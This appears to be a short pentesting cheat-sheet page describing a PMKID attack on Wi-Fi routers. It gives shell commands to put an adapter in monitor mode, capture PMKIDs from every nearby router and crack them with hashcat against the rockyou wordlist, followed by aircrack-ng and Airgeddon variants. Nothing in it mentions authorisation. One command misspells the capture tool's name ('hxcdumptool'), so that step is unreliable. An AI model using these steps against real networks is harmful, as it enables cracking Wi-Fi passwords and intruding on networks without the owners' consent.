githubEdit

PMKID Attack

Routers vulnerable: Enabled roaming feature.

Tools: hcxtools, aircrack-ng suite

Steps:

1) Install hcxtools

sudo apt install hcxtools

2) Set our Wi-Fi adapter or NIC in monitor mode

sudo airmon-ng start wlan0

3) Capture PMKIDs from all the routers around us

sudo hxcdumptool -o demo -i wlan0mon --enable_status 5

4) Convert pcapng file to hashcat format

sudo hcxpcaptool -z pmkidhash demo

5) Crack hash

hashcat -m 16800 --force pmkidhash /usr/share/wordlists/rockyou.txt --show

Capture only a single PMKID

1) Capture the PMKID from a single AP

2) Convert pcapng file to hashcat format

3) Crack hash

Alternate method: Convert pcapng to pcap, then crack using Aircrack-ng

1) Convert pcapng to pcap

2) Crack file

PMKID Attack using Airgeddon

1) Run Airgeddon

2) Choose option 5

3) Again, choose option 5

4) Select your target according to the number it is located

5) Timeout in seconds (10-100)

6) Store file as a .cap file

7) Crack with the intrgrated aircrack-ng

Last updated